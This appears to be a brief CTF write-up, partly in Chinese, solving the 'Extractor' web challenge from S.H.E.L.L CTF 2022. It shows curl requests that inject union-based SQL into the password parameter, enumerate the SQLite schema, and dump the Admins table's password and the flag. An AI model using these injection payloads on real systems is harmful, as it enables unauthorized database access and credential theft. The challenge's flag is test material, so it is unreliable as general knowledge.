Extractor
1 Problem
提示: - Flag format :- shellctf{H3re_1s_tH3_fL4G} - http://20.125.142.38:8956 - Alternate URL :- http://20.193.247.209:8555/ - More Alternate URL :- http://52.66.29.74:8999/
两个链接:注册,登录
curl 'http://20.125.142.38:8956/register?username=hu&pass=hu&content=hu'
curl 'http://20.125.142.38:8956/login' # 纯HTML页面,点Login跳转profile
curl 'http://20.125.142.38:8956/profile?username=hu&pass=hu&content='
2 exp
profile在Password处存在注入:0' union select 1,2,3,4--, 数据库类型为sqlite
hamilton@hamilton-Lenovo-G470:~/Downloads$ curl "http://52.66.29.74:8999/profile?username=hu&pass=0%27+union+select+1,2,3,4--&content=" | grep h3
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 3637 100 3637 0 0 12761 0 --:--:-- --:--:-- --:--:-- 12806
<p> <h3> Here is what you left with us : </h3></p>
<h3> Name : 2 </h3>
<h3> Password : 3</h3>
<h3> Signature : 4</h3>
hamilton@hamilton-Lenovo-G470:~/Downloads$ curl "http://52.66.29.74:8999/profile?username=hu&pass=0%27+union+select+1,2,3,name+from+sqlite_master--&content=" | grep h3
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 3642 100 3642 0 0 12472 0 --:--:-- --:--:-- --:--:-- 12472
<p> <h3> Here is what you left with us : </h3></p>
<h3> Name : 2 </h3>
<h3> Password : 3</h3>
<h3> Signature : Admins</h3>
curl "http://52.66.29.74:8999/profile?username=hu&pass=0%27+union+select+*+from+Admins--&content=" | grep h3
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 3686 100 3686 0 0 7431 0 --:--:-- --:--:-- --:--:-- 7416
<p> <h3> Here is what you left with us : </h3></p>
<h3> Name : Adminnn </h3>
<h3> Password : H4rD_t0_Gue5s</h3>
<h3> Signature : shellctf{Sql_1Nj3c7i0n_B45iC_XD}</h3>
原题见 https://github.com/S-H-E-L-L/S.H.E.L.L-CTF-2022/tree/main/web/Extractor